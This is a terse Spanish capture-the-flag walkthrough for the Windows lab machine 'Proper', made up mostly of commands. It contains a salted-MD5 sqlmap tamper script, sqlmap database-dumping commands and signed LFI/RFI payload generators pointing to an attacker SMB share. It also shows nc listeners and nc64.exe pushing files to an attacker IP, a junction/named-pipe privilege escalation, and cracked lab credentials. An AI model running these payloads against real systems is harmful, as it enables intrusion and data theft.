# Proper

**OS**: Windows \
**Dificultad**: Difícil
**Puntos**: 40

## Resumen

## Nmap Scan

`nmap -sV -sC -oN nmap.txt 10.10.10.231`

```
Nmap scan report for 10.10.10.231
Host is up (0.070s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

`gobuster dir -u http://10.10.10.231/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,dat`

```
id+desc
id desc
```

`a1b30d31d344a5a4e41e8496ccbdd26b:hie0shah6ooNoim`

`hashcat -m 20 hash.txt list.txt --quiet`

##### tamper_md5.py
```python
#!/usr/bin/env python

from hashlib import md5
from urllib.parse import quote_plus
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    salt = b"hie0shah6ooNoim"
    h = md5(salt + payload.encode()).hexdigest()
    retVal = "%s&h=%s" % (quote_plus(payload), h)

    return retVal
```

`cp tamper_md5.py /usr/share/sqlmap/tamper/`

`sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --level 3 --tamper=tamper_md5.py --skip-urlencode`

`sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper_md5.py --skip-urlencode --current-db`
`sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper_md5.py --skip-urlencode -D cleaner --tables`
`sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper_md5.py --skip-urlencode -D cleaner -T customers --columns`
`sqlmap -u "http://10.10.10.231/products-ajax.php?order=1" --tamper=tamper_md5.py --skip-urlencode -D cleaner -T customers --dump`

`cat /root/.local/share/sqlmap/output/10.10.10.231/dump/cleaner/customers.csv | cut -d "," -f 3 > password.txt`
`hashcat -m 0 password.txt /usr/share/wordlists/rockyou.txt --quiet`


##### test.py
```python
from hashlib import md5

def lfi():
    salt = b"hie0shah6ooNoim"
    payload = b".."
    h = md5(salt + payload).hexdigest()
    retVal = "theme=%s&h=%s" % (payload.decode(), h)

    print(retVal)

lfi()
```

### RFI

```python
from hashlib import md5

def rfi():
    salt = b"hie0shah6ooNoim"
    payload = b"//10.10.14.33/DOOM"
    h = md5(salt + payload).hexdigest()
    retVal = "theme=%s&h=%s" % (payload.decode(), h)

    print(retVal)

rfi()
```

`python3 rfi.py`
`python3 /opt/impacket/examples/smbserver.py DOOM . -smb2support`
`john web_hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

```
web : charlotte123!
```

### RCE

`python3 /opt/impacket/examples/smbserver.py -username web -password 'charlotte123!' DOOM test -smb2support`
`python3 -m http.server 80`
`nc -lvnp 443`
`python3 lfi.py`



## Escalada de Privilegios (User)

`c:\temp\nc64.exe -w 10 10.10.14.33 4444 < client.exe`
`c:\temp\nc64.exe -w 10 10.10.14.33 4444 < server.exe`

## Escalada de Privilegios (Root)

`mklink /j doom \users\administrator\desktop`
`echo CLEAN \temp\doom\root.txtx > \\.\pipe\cleanupPipe`
`dir \programdata\cleanup`
`rmdir doom`
`mkdir doom`
`echo RESTORE \temp\doom\root.txtx > \\.\pipe\cleanupPipe`


## Referencias
https://hashcat.net/wiki/doku.php?id=example_hashes \
https://gist.github.com/KINGSABRI/c8b03821e1b8da5dd080f479e9b6b057 \
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#basic-rfi \
https://eternallybored.org/misc/netcat/